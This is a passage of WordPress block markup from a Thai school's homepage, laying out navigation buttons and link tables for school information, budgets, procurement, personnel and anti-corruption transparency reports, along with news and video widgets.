{\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 